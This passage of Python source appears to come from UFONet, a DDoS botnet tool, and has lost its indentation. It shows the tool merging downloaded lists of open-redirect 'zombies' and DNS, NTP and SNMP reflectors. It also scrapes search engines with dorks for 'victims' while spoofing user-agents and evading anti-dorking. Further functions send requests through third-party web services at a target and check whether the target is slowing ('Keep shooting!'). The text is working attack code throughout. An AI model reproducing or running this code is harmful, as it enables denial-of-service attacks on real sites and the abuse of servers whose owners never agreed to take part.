num_robots = 0
with open('botnet/robots.txt') as f: # droids
for _ in f:
num_robots = num_robots + 1
print("[Info] Droids : " + str(num_robots))
num_drones = 0
with open('botnet/drones.txt') as f: # ucavs
for _ in f:
num_drones = num_drones + 1
print("[Info] UCAVs : " + str(num_drones))
num_reflectors = 0
with open('botnet/reflectors.txt') as f: # rpcs
for _ in f:
num_reflectors = num_reflectors + 1
print("[Info] X-RPCs : " + str(num_reflectors))
num_crystals = 0
with open('botnet/crystals.txt') as f: # dns
for _ in f:
num_crystals = num_crystals + 1
print("[Info] DNSs : " + str(num_crystals))
num_warps = 0
with open('botnet/warps.txt') as f: # ntp
for _ in f:
num_warps = num_warps + 1
print("[Info] NTPs : " + str(num_warps))
num_bosons = 0
with open('botnet/bosons.txt') as f: # snmp
for _ in f:
num_bosons = num_bosons + 1
print("[Info] SNMPs : " + str(num_bosons))
total_zombies = num_abductions + num_troops + num_crystals + num_robots + num_drones + num_reflectors + num_warps + num_bosons
print("\n[Info] [AI] Congratulations!. Total downloaded: " + str(total_zombies))
print('-'*12)
if not self.options.forceyes:
update_reply = input("\n[AI] Do you want to merge ONLY the new 'troops' into your army? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
os.remove('botnet/abductions.txt') # remove zombies/abductions file
os.remove('botnet/troops.txt') # remove aliens/troops file
os.remove('botnet/crystals.txt') # remove dns/crystals file
os.remove('botnet/robots.txt') # remove droids/robots file
os.remove('botnet/drones.txt') # remove ucavs/drones file
os.remove('botnet/reflectors.txt') # remove rpcs/reflectors file
os.remove('botnet/warps.txt') # remove ntp/warps file
os.remove('botnet/bosons.txt') # remove snmp/bosons file
print("\n[Info] [AI] [Control] Temporal list downloaded has been removed! -> [Exiting!]")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
else:
zombies_ready = []
f = open('botnet/abductions.txt')
abductions = f.readlines()
f.close()
fz = open(self.zombies_file)
zombies = fz.readlines()
fz.close()
for abduction in abductions:
abduction = abduction.replace('\n','')
if abduction not in zombies:
zombies_ready.append(abduction)
else:
pass
self.update_zombies(zombies_ready)
os.remove('botnet/abductions.txt') # remove zombies/abductions file
aliens_ready = []
f = open('botnet/troops.txt')
troops = f.readlines()
f.close()
fz = open(self.aliens_file)
aliens = fz.readlines()
fz.close()
for alien in troops:
alien = alien.replace('\n','')
if alien not in aliens:
aliens_ready.append(alien)
else:
pass
self.update_aliens(aliens_ready)
os.remove('botnet/troops.txt') # remove aliens/troops file
dnss_ready = []
f = open('botnet/crystals.txt')
crystals = f.readlines()
f.close()
fz = open(self.dnss_file)
dnss = fz.readlines()
fz.close()
for crystal in crystals:
crystal = crystal.replace('\n','')
if crystal not in dnss:
dnss_ready.append(crystal)
else:
pass
self.update_dnss(dnss_ready)
os.remove('botnet/crystals.txt') # remove dns/crystals file
droids_ready = []
f = open('botnet/robots.txt')
robots = f.readlines()
f.close()
fz = open(self.droids_file)
droids = fz.readlines()
fz.close()
for droid in robots:
droid = droid.replace('\n','')
if droid not in droids:
droids_ready.append(droid)
else:
pass
self.update_droids(droids_ready)
os.remove('botnet/robots.txt') # remove droids/robots file
ucavs_ready = []
f = open('botnet/drones.txt')
drones = f.readlines()
f.close()
fz = open(self.ucavs_file)
ucavs = fz.readlines()
fz.close()
for drone in drones:
drone = drone.replace('\n','')
if drone not in ucavs:
ucavs_ready.append(drone)
else:
pass
self.update_ucavs(ucavs_ready)
os.remove('botnet/drones.txt') # remove UCAVs/drones file
rpcs_ready = []
f = open('botnet/reflectors.txt')
reflectors = f.readlines()
f.close()
fz = open(self.rpcs_file)
rpcs = fz.readlines()
fz.close()
for reflector in reflectors:
reflector = reflector.replace('\n','')
if reflector not in rpcs:
rpcs_ready.append(reflector)
else:
pass
self.update_rpcs(rpcs_ready)
os.remove('botnet/reflectors.txt') # remove RPCs/reflectors file
ntps_ready = []
f = open('botnet/warps.txt')
warps = f.readlines()
f.close()
fz = open(self.ntps_file)
ntps = fz.readlines()
fz.close()
for warp in warps:
warp = warp.replace('\n','')
if warp not in ntps:
ntps_ready.append(warp)
else:
pass
self.update_ntps(ntps_ready)
os.remove('botnet/warps.txt') # remove NTP/warps file
snmps_ready = []
f = open('botnet/bosons.txt')
bosons = f.readlines()
f.close()
fz = open(self.snmps_file)
snmps = fz.readlines()
fz.close()
for boson in bosons:
boson = boson.replace('\n','')
if boson not in snmps:
snmps_ready.append(boson)
else:
pass
self.update_snmps(snmps_ready)
os.remove('botnet/bosons.txt') # remove SNMP/bosons file
print("\n[Info] [AI] Botnet updated! -> ;-)")
self.update_transferred_stats(self.trans_zombies) # update json file with transferred stats (blackhole)
if not self.options.forceyes: # ask for update everything
print('-'*25 + "\n")
update_reply = input("[AI] You would also like to update other content: [News] [Missions] [Grid] [Board]... (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("\n[AI] "+self.exit_msg+"\n")
return
else:
try:
update_gui = self.update_gui_data() # update GUI data
except:
print('-'*25 +"\n")
print("[Error] [AI] Something wrong downloading GUI content! -> [Aborting!]")
print('-'*25)
print("\n[AI] "+self.exit_msg+"\n")
return
def uploading_github_list(self):
print(" 0. Set a different URL (if required) for code repository sources:\n\n [current: "+self.github_zombies+"]\n")
print(" 1. Test your 'zombies' to upload only those that really work (ex: ufonet --test-all).")
print(" 2. Make a -PULL REQUEST- to the owner of the code repository.")
print(" 3. Share your updates in the #UFONet 'motherships'...\n")
print('='*22 + '\n')
print("[AI] "+self.exit_msg+"\n")
def create_web_interface(self):
# launch webserver+gui
from .webgui import ClientThread
import webbrowser
host = '0.0.0.0'
port = 9999
try:
webbrowser.open('http://127.0.0.1:9999', new=1)
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tcpsock.bind((host,port))
while True:
tcpsock.listen(4)
(clientsock, (ip, port)) = tcpsock.accept()
newthread = ClientThread(ip, port, clientsock)
newthread.start()
except (KeyboardInterrupt, SystemExit):
sys.exit()
def extract_dorks(self):
# extract dorks from file (ex: 'dorks.txt')
try:
f = open(self.dorks_file)
dorks = f.readlines()
dorks = [ dork.replace('\n','') for dork in dorks ]
f.close()
if not dorks:
if not options.autosearch:
print("[Error] [AI] [Control] Cannot retrieve [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n")
return
else:
return dorks
except:
if not options.autosearch:
if os.path.exists(self.dorks_file) == True:
print("[Error] [AI] [Control] Cannot open [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
print("[Error] [AI] [Control] Cannot found [Dorks] from: 'botnet/dorks.txt' -> [Aborting!]\n")
return #sys.exit(2)
else:
return
def search_zombies(self, dork, zombies_found):
# crawlering on search engine results to extract zombies
options = self.options
zombies = []
if not options.engine: # default search engine
options.engine = 'duck'
if options.engine == 'bing': # using bing [28/02/2019: OK!]
url = 'https://www.bing.com/search?'
if options.search: # search from query
q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
if options.dorks or options.autosearch: # search from a dork
q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
start = 0 # set index number of first entry
query_string = { 'q':q, 'first':start }
data = urllib.parse.urlencode(query_string)
url = url + data
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.verbose:
print(("[Info] [AI] [DORKING] Query used: " + url + "\n"))
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except:
print('[Error] [AI] Unable to connect to: bing\n')
if options.allengines or options.autosearch:
return
if not options.dorks or not options.autosearch:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
return #sys.exit(2)
print("\nSearch engines available:")
print('-'*25)
for e in self.search_engines:
print("+ "+e)
print('-'*25)
print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
return #sys.exit(2)
else:
req_reply = ''
regex = '<li class="b_algo"><h2><a href="(.+?)">' # regex magics
pattern = re.compile(regex)
url_links = re.findall(pattern, req_reply)
elif options.engine == 'yahoo': # yahoo [28/02/2019: OK!]
location = ['fr', 'de', 'es', 'nl', 'it', 'se', 'ch', 'jp', 'ru', 'lt'] # evading Yahoo anti-dorking [grey magic: 28/02/2019]
#location = ['fr', 'de', 'es', 'nl', 'se', 'ch', 'ru'] # [08/04/2017]
location = str(random.choice(location).strip()) # shuffle location
if location == "jp": # [28/02/2019]
url = 'https://search.yahoo.co.jp/search?'
else:
url = 'https://'+location+'.search.yahoo.com/search?'
if options.search: # search from query
if location == "jp":
q = '"' + str(options.search) + '"' # set query to search literally on results
else:
q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
if options.dorks or options.autosearch: # search from a dork
if location == "jp":
q = '"' + str(dork) + '"' # set query to search literally on results
else:
q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
start = 0 # set index number of first entry
query_string = { 'p':q, 'b':start }
data = urllib.parse.urlencode(query_string)
url = url + data
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.verbose:
print(("[Info] [AI] [DORKING] Query used: " + url + "\n"))
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, None, headers)
req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except:
print('[Error] [AI] Unable to connect to: yahoo\n')
if options.allengines or options.autosearch:
return
if not options.dorks or not options.autosearch:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
return #sys.exit(2)
print("\nSearch engines available:")
print('-'*25)
for e in self.search_engines:
print("+ "+e)
print('-'*25)
print("\nEx: ufonet -s 'proxy.php?url=' --se 'bing'")
return #sys.exit(2)
else:
req_reply = ''
#regex = '<h3 class="title"><a style="color:#2C46C7" class=" td-u" href="(.+?)" target="_blank"' # regex magics [18/08/2016]
regex = 'href="(.+?)" target="_blank" data' # regex magics [08/04/2017]
pattern = re.compile(regex)
url_links = re.findall(pattern, req_reply)
elif options.engine == 'duck': # using duckduckgo [28/02/2019: OK!]
url = 'https://duckduckgo.com/html/'
if options.search: # search from query
q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
if options.dorks or options.autosearch: # search from a dork
q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
query_string = { 'q':q }
data = urllib.parse.urlencode(query_string)
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if options.verbose:
print("[Info] [AI] [DORKING] Query used: " + url + " (POST: "+ data + ")\n")
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request(url, data.encode('utf-8'), headers) # HTTP POST request
req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
except:
print('[Error] [AI] Unable to connect to: duck\n')
if options.allengines or options.autosearch:
return
if not options.dorks or not options.autosearch:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
return #sys.exit(2)
print("\nSearch engines available:")
print('-'*25)
for e in self.search_engines:
print("+ "+e)
print('-'*25)
print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
return #sys.exit(2)
else:
req_reply = ''
regex = 'snippet" href="(.+?)">' # regex magics
pattern = re.compile(regex)
url_links = re.findall(pattern, req_reply)
else: # no valid search engine
print('[Error] [AI] This search engine is not supported!\n')
if not options.dorks or options.autosearch:
if not self.options.forceyes:
update_reply = input("[AI] Do you want to try a different search engine? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
return #sys.exit(2)
print("\nSearch engines available:")
print('-'*25)
for e in self.search_engines:
print("+ "+e)
print('-'*25)
print("\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'")
return #sys.exit(2)
else:
req_reply = ''
if options.num_results: # set number of results to search
try:
num = int(options.num_results)
except:
print("[Info] [AI] You should specify an integer!... Using default value: 10\n")
num = 10
else:
num = 10
total_results = 1
for url in url_links: # general parse on urls
if int(num) < int(total_results):
break
if options.engine == "bing":
if " h=" in url: # regex magics [18/08/2016]
url = url.rsplit('" h=',1)[0]
if options.engine == "yahoo":
if 'RU=' in url: # regex magics [18/08/2016]
url = url.rsplit('RU=',1)[1]
if 'UTF-8&u=' in url: # regex magics [05/02/2018]
url = url.rsplit('UTF-8&u=',1)[1]
total_results = total_results + 1 # results counter
url_link = urllib.parse.unquote(url) # unquote encoding
if options.search:
sep = str(options.search)
if options.dorks or options.autosearch:
sep = str(dork)
url_link = url_link.rsplit(sep, 1)[0] + sep
if 'href="' in url_link:
url_link = url_link.rsplit('href="', 1)[1]
if "instreamset" in url_link: # invalid zombie
url_link = "" # discarded
if '" ' in url_link:
url_link = url_link.rsplit('" ', 1)[1]
if options.engine in url_link:
url_link = "" # discarded
if 'http' not in url_link:
url_link = "" # discarded
else:
if url_link not in zombies and url_link+os.linesep not in zombies_found and url_link != "": # AI mode (parsing search engines mixed pool and stored army)
print('+Victim found: ' + url_link)
zombies.append(url_link)
else:
pass
if len(zombies) == 0: # print dorking results
print("[Info] [AI] NOT any NEW victim(s) found for this query!\n")
if not options.dorks:
if not options.autosearch:
if not self.options.forceyes:
return #sys.exit(2)
self.total_possible_zombies = self.total_possible_zombies + len(zombies)
print("")
return zombies
def check_nat(self):
# check for NAT configuration
options = self.options
tor_reply = urllib.request.urlopen(self.check_tor_url).read().decode('utf-8') # check if TOR is enabled
your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip()
check_ip_service = None
if not tor_reply or 'Congratulations' not in tor_reply:
print("[Info] [AI] It seems that you are not using TOR to recieve data. -> [OK!]\n")
else:
print("[Error] [AI] You are using TOR as public IP... It's not possible to NAT! -> [Aborting!]\n")
self.nat_error_flag = "ON"
return #sys.exit(2)
try:
data = str(urlopen(self.check_ip_service1).read()) # check for public ip
self.pub_ip = re.compile(r'Address: (\d+\.\d+\.\d+\.\d+)').search(data).group(1)
check_ip_service = self.check_ip_service1
except:
try: # another check for public ip
data = str(urlopen(self.check_ip_service2).read())
self.pub_ip = re.compile(r'">(\d+\.\d+\.\d+\.\d+)</span>').search(data).group(1)
check_ip_service = self.check_ip_service2
except:
print("[Error] [AI] Something wrong checking your public IP! -> [Exiting!]\n")
self.nat_error_flag = "ON"
return
t = urlparse(check_ip_service)
name_service = t.netloc
print(" + Public: " + self.pub_ip + " | "+name_service+"\n")
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 0)) # connecting to a UDP address doesn't send packets (black magic)
self.local_ip = s.getsockname()[0]
print(" + Local: " + self.local_ip + "\n")
print('='*22 + '\n')
def extract_ucavs(self):
# extract ucavs from file
options = self.options
try:
f = open(self.ucavs_file)
ucavs = f.readlines()
ucavs = [ ucav.replace('\n','') for ucav in ucavs ]
f.close()
if not ucavs:
print("[Info] [AI] [Control] Cannot retrieve [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]")
self.options.disableucavs = True
return
else:
return ucavs
except:
if os.path.exists(self.ucavs_file) == True:
print("[Info] [AI] [Control] Cannot open [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]")
return #sys.exit(2)
else:
print("[Info] [AI] [Control] Cannot found [UCAVs] from: 'botnet/ucavs.txt' -> [Discarding!]")
return #sys.exit(2)
def discarding_ucavs(self, ucav, ucavs):
if ucav in self.discard_ucavs:
ucavs.remove(ucav)
if self.options.verbose:
print(("[Info] [AI] [Control] [UCAVs] "+str(ucav)+" is not working! -> [Discarding!]"))
self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats
return ucavs
def send_ucavs(self, ucavs):
# extract external status checkers, perform a request and check results
time.sleep(5) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not ucavs: # return when not any working
self.options.disableucavs = True
return
options = self.options
target = self.options.target
shuffle(ucavs) # shuffle ucavs order, each round :-)
if not self.options.disablepurge:
for ucav in ucavs:
if not ucav.startswith('http'): # discarded inmediately
self.discard_ucavs.append(ucav)
self.num_discard_ucavs = self.num_discard_ucavs + 1
ucavs = self.discarding_ucavs(ucav, ucavs) # check if ucav is failing for autobalance army
if not self.options.disablepurge:
if not ucavs: # return when not any working
self.options.disableucavs = True
return
shuffle(ucavs) # shuffle ucavs order, each discarding check :-)
for ucav in ucavs:
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
if target.startswith("http://"): # parse target for some checkers
target = target.replace('http://','')
elif target.startswith("https://"):
target = target.replace('https://','')
url = ucav + target
t = urlparse(ucav)
name_ucav = t.netloc
if name_ucav == "":
name_ucav = ucav
if options.verbose:
print(("[Info] [UCAVs] Sniping: " + url))
try:
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
if options.timeout: # set timeout
ucav_timeout = options.timeout
else:
ucav_timeout = 5
if ucav_timeout < 1:
ucav_timeout = 5
req = urllib.request.Request(url, None, headers)
target_reply = urllib.request.urlopen(req, context=self.ctx, timeout=ucav_timeout).read().decode('utf-8')
self.ucavs_hit = self.ucavs_hit + 1 # add ucav hit to stats
except:
print("[Info] [UCAVs] " + name_ucav + " -> FAILED (cannot connect!)")
if not self.options.disablepurge:
self.discard_ucavs.append(ucav)
self.num_discard_ucavs = self.num_discard_ucavs + 1
self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats
target_reply = ""
if target_reply == "": # check for target's status resolved by [UCAVs]
pass
else:
if not "is down" or not "looks down" or not "No info found for host" in target_reply: # parse external service for reply
print("[Info] [UCAVs] " + name_ucav + " -> Target is ONLINE! -> [Keep shooting!]")
self.num_is_up = self.num_is_up + 1
else:
print("[Info] [UCAVs] " + name_ucav + " -> Target looks OFFLINE! -> [Checking!]")
self.num_is_down = self.num_is_down + 1
if self.options.verbose:
print("[Info] [AI] [UCAVs] "+str(name_ucav)+" is returning...")
self.extra_zombies_lock = False # [ARMY] have finished
def extract_median(self, num_list):
# extract median from a list of numbers
import statistics
int_num = []
for num in num_list:
num = float(num)
int_num.append(num)
return statistics.median(int_num)
def check_is_loading(self, target):
# perform a broadband test (using GET) to analize target's reply to the traffic generated each round
self.start = None
self.stop = None
print('\n---------')
print("\n[Info] [AI] Scanning target to check for levels on defensive shields...\n")
if target.endswith(""):
target.replace("", "/")
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
try:
req = urllib.request.Request(target, None, headers)
if self.options.proxy: # set proxy
self.proxy_transport(self.options.proxy)
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
self.start = time.time()
target_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read().decode('utf-8')
header = urllib.request.urlopen(req, context=self.ctx).info()
self.stop = time.time()
except:
print('[Info] [AI] Our scanner cannot connect to the target this round! -> [Skipping!]\n')
return
try:
s, size_name = self.convert_size(len(target_reply))
self.loadcheck_size_list.append(s) # add record to size list
size = '%s %s' % (s,size_name)
except:
size = "Error!"
try:
time_required = self.stop - self.start
load = self.convert_time(time_required)
self.loadcheck_load_list.append(load) # add record to load list
except:
load = "Error!"
self.loadcheck_counter = self.loadcheck_counter + 1
print(' -Total tests:', self.loadcheck_counter, "\n")
if self.loadcheck_prev_size is not None and self.loadcheck_prev_load is not None:
lsm = self.extract_median(self.loadcheck_size_list)
if lsm is not None:
self.loadcheck_size_median = str(lsm) + " " + size_name
else:
self.loadcheck_size_median = None
llm = self.extract_median(self.loadcheck_load_list)
if llm is not None:
self.loadcheck_load_median = str(llm) + " seconds"
else:
self.loadcheck_load_median = None
if self.loadcheck_counter == 2: # first round
print(' -Bytes in (first round) :', self.loadcheck_first_size)
print(' -Bytes in (this round) :', size)
if self.loadcheck_size_median is not None:
print(' -Bytes in (median) :', self.loadcheck_size_median)
print(' ----')
print(' -Load time (first round) :', self.loadcheck_first_load, "seconds")
print(' -Load time (this round) :', load, "seconds")
if self.loadcheck_load_median is not None:
print(' -Load time (median) :', self.loadcheck_load_median, "\n")
else:
print("\n")
self.loadcheck_size_max = None
self.loadcheck_size_min = None
self.loadcheck_load_max = None
self.loadcheck_load_min = None
elif self.loadcheck_counter > 2: # rest of rounds
lsmax = max(self.loadcheck_size_list)
if lsmax is not None:
self.loadcheck_size_max = str(lsmax) + " " + size_name
else:
self.loadcheck_size_max = None
lsmin = min(self.loadcheck_size_list)
if lsmin is not None:
self.loadcheck_size_min = str(lsmin) + " " + size_name
else:
self.loadcheck_size_min = None
llmax = max(self.loadcheck_load_list)
if llmax is not None:
self.loadcheck_load_max = str(llmax) + " seconds"
else:
self.loadcheck_load_max = None
llmin = min(self.loadcheck_load_list)
if llmin is not None:
self.loadcheck_load_min = str(llmin) + " seconds"
else:
self.loadcheck_load_min = None
print(' -Bytes in (first round) :', self.loadcheck_first_size)
print(' -Bytes in (previous round) :', self.loadcheck_prev_size)
print(' -Bytes in (this round) :', size)
if self.loadcheck_size_max is not None:
print(' -Bytes in (max) :', self.loadcheck_size_max)
if self.loadcheck_size_min is not None:
print(' -Bytes in (min) :', self.loadcheck_size_min)
if self.loadcheck_size_median is not None:
print(' -Bytes in (median) :', self.loadcheck_size_median)
print(' ----')
print(' -Load time (first round) :', self.loadcheck_first_load, "seconds")
print(' -Load time (previous round):', self.loadcheck_prev_load, "seconds")
print(' -Load time (this round) :', load, "seconds")
if self.loadcheck_load_max is not None:
print(' -Load time (max) :', self.loadcheck_load_max)
if self.loadcheck_load_min is not None:
print(' -Load time (min) :', self.loadcheck_load_min)
if self.loadcheck_load_median is not None:
print(' -Load time (median) :', self.loadcheck_load_median, "\n")
else:
print("\n")
if self.loadcheck_prev_load < load: # target is loading more slowly
print("[Info] [AI] [Scanner] Target is serving the content more slowly this round! ;-) -> [Keep shooting!]\n")
elif self.loadcheck_prev_load == load: # inmutable target
print("[Info] [AI] [Scanner] Attack is not having any effect on your target this round... -> [Keep shooting!]\n")
elif self.loadcheck_prev_load > load: # is target defending?
print("[Info] [AI] [Scanner] Target is loading this round faster than the previous one! -> DETECTED: [PROXY CACHE!!]\n")
else:
print(' -Bytes in (this round) :', size)
print(' -Load time (this round):', load, "seconds\n")
self.loadcheck_first_size = size
self.loadcheck_first_load = load
self.loadcheck_size_median = None
self.loadcheck_load_median = None
self.loadcheck_size_max = None
self.loadcheck_size_min = None
self.loadcheck_load_max = None
self.loadcheck_load_min = None
self.loadcheck_prev_size = size # record previous size
self.loadcheck_prev_load = load # record previous load
def convert_size(self, size):
if (size == 0):
return '0 B'
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size,1024)))
p = math.pow(1024,i)
s = round(size/p,2)
return s, size_name[i]
def convert_time(self, time):
return '%.2f' % time
def discarding_zombies(self, zombie, zombies):
if zombie in self.discardzombies:
zombies.remove(zombie)
if self.options.verbose:
print(("[Info] [AI] [Control] [Zombies] "+str(zombie)+" is not working! -> [Discarding!]"))
return zombies
def send_zombies(self, zombies):
# send Open Redirect zombies
time.sleep(1) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not zombies:
self.empty_zombies = True
return
if self.options.verbose:
print("[Info] [AI] [Control] Deploying [Zombies] with 'maser-melee' weapons...")
options = self.options
target = self.options.target
shuffle(zombies) # shuffle zombies order, each round :-)
if not self.options.disablepurge:
for zombie in zombies: # check if zombie is failing for autobalance army
if not zombie.startswith('http'): # discarded inmediately
self.discardzombies.append(zombie)
self.num_discard_zombies = self.num_discard_zombies + 1
zombies = self.discarding_zombies(zombie, zombies)
if not self.options.disablepurge:
if not zombies: # return when not any working
self.empty_zombies = True
return
for zombie in zombies:
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
if not self.options.attackme:
print("[Info] [Zombies] Attacking from: " + name_zombie)
else: # on attackme, target url is dynamic -> http://public_ip:port/hash|zombie
self.mothership_hash = random.getrandbits(128) # generating random evasion hash
target = "http://" + str(self.pub_ip) + ":" + self.port + "/"+ str(self.mothership_hash) + "|" + zombie
self.options.target = target
print("[Info] [Zombies] Attacking: " + str(self.pub_ip) + ":" + self.port + " -> [LAN]" + self.local_ip + ":" + self.port)
print("[Info] [Zombies] Payload: " + target)
print('='*55, "\n")
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
if not options.target.startswith('http'):
if options.forcessl:
options.target = "https://" + options.target
else:
options.target = "http://" + options.target
self.attack_mode = True
try:
if options.verbose:
print("[Info] [Zombies] Sniping: " + options.target)
self.connect_zombies(zombie)
if self.options.dbstress: # try to stress db on target by using vulnerable Open Redirect web servers
self.db_flash = self.db_flash + 1
stress = self.stressing(target, zombie)
except Exception:
print("[Info] [Zombies] " + zombie + " -> FAILED (cannot connect!)")
self.total_zombies_failed_connection = self.total_zombies_failed_connection + 1 # used to manage threading pool
if not self.options.disablepurge:
self.discardzombies.append(zombie)
self.num_discard_zombies = self.num_discard_zombies + 1
if self.options.verbose:
print("[Info] [AI] [Zombies] "+str(name_zombie)+" is returning...")
self.attack_mode = False
def discarding_aliens(self, alien, aliens):
if alien in self.discard_aliens:
aliens.remove(alien)
if self.options.verbose:
print(("[Info] [AI] [Control] [Aliens] "+str(alien)+" is not working! -> [Discarding!]"))
self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
return aliens
def send_aliens(self, aliens):
# extract external web abuse services urls (POST) and perform requests against target
time.sleep(2) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not aliens: # return when not any working
self.options.disablealiens = True
return
target = self.options.target
options = self.options
shuffle(aliens) # shuffle aliens
if not self.options.disablepurge:
for alien in aliens:
if not alien.startswith('http'): # discarded inmediately
self.discard_aliens.append(alien)
self.num_discard_aliens = self.num_discard_aliens + 1
aliens = self.discarding_aliens(alien, aliens) # check if alien is failing for autobalance army
if not self.options.disablepurge:
if not aliens: # return when not any working
self.options.disablealiens = True
return
shuffle(aliens) # shuffle aliens order, each discarding check :-)
for alien in aliens:
name_alien = None
if "$POST" in alien: # extract alien/parameters -> search for $POST delimiter on 'aliens.txt' file
regex_alien = re.compile('{}(.*){}'.format(re.escape(''), re.escape(';$POST'))) # regex magics
pattern_alien = re.compile(regex_alien)
alien_url = re.findall(pattern_alien, alien) # HTTP POST url for submit data
regex_param = re.compile('{}(.*){}'.format(re.escape('$POST;'), re.escape(''))) # regex magics
pattern_param = re.compile(regex_param)
param = re.findall(pattern_param, alien) # HTTP POST params to submit
for u in alien_url:
url = u # ex: POST -> path/submit.php
t = urlparse(url)
name_alien = t.netloc
if name_alien == "":
name_alien = alien
print("[Info] [Aliens] Attacking from: " + name_alien)
for p in param:
param_target = {p : target} # ex POST -> url=target
param_target = urllib.parse.urlencode(param_target)
try:
if options.verbose:
print("[Info] [Aliens] Sniping: " + url + " - POST:", param_target)
if options.proxy: # set proxy
self.proxy_transport(options.proxy)
if self.options.timeout: # set timeout
try:
alien_timeout = int(self.options.timeout)
except:
alien_timeout = 5
else:
alien_timeout = 5
if alien_timeout < 1:
alien_timeout = 5
req = urllib.request.Request(url, param_target.encode('utf-8'))
rsp = urllib.request.urlopen(req, context=self.ctx, timeout=alien_timeout)
self.aliens_hit = self.aliens_hit + 1 # add hit to aliens stats
except Exception:
print("[Info] [Aliens] " + name_alien + " -> FAILED (cannot connect!)")
self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
if not self.options.disablepurge:
self.discard_aliens.append(alien)
self.num_discard_aliens = self.num_discard_aliens + 1
else:
print(("[Info] [Aliens] "+str(alien)+" -> FAILED (invalid alien!)"))
self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
if not self.options.disablepurge:
self.discard_aliens.append(alien)
self.num_discard_aliens = self.num_discard_aliens + 1
if self.options.verbose:
if name_alien:
print("[Info] [AI] [Aliens] "+str(name_alien)+" is returning...")
else:
print("[Info] [AI] [Aliens] "+str(alien)+" is returning...")
if self.options.disabledroids and self.options.disablerpcs and self.options.disableucavs:
self.extra_zombies_lock = False # [ARMY] have finished
def extract_aliens(self):
# extract aliens from file
options = self.options
try:
f = open(self.aliens_file)
aliens = f.readlines()
aliens = [ alien.replace('\n','') for alien in aliens ]
f.close()
if not aliens:
print("[Info] [AI] [Control] Cannot retrieve [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]")
self.options.disablealiens = True
return
else:
return aliens
except:
if os.path.exists(self.aliens_file) == True:
print("[Info] [AI] [Control] Cannot open [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]")
return #sys.exit(2)
else:
print("[Info] [AI] [Control] Cannot found [Aliens] from: 'botnet/aliens.txt' -> [Discarding!]")
return #sys.exit(2)
def discarding_droids(self, droid, droids):
if droid in self.discard_droids:
droids.remove(droid)
if self.options.verbose:
print(("[Info] [AI] [Control] [Droids] "+str(droid)+" is not working! -> [Discarding!]"))
self.droids_fail = self.droids_fail + 1 # add fail to droids stats
return droids
def send_droids(self, droids):
# extract external web abuse services urls (GET) and perform requests against target
time.sleep(3) # aiming (multi-threading flow time compensation)
if not self.options.disablepurge:
if not droids: # return when not any working
self.options.disabledroids = True
return
target = self.options.target
try:
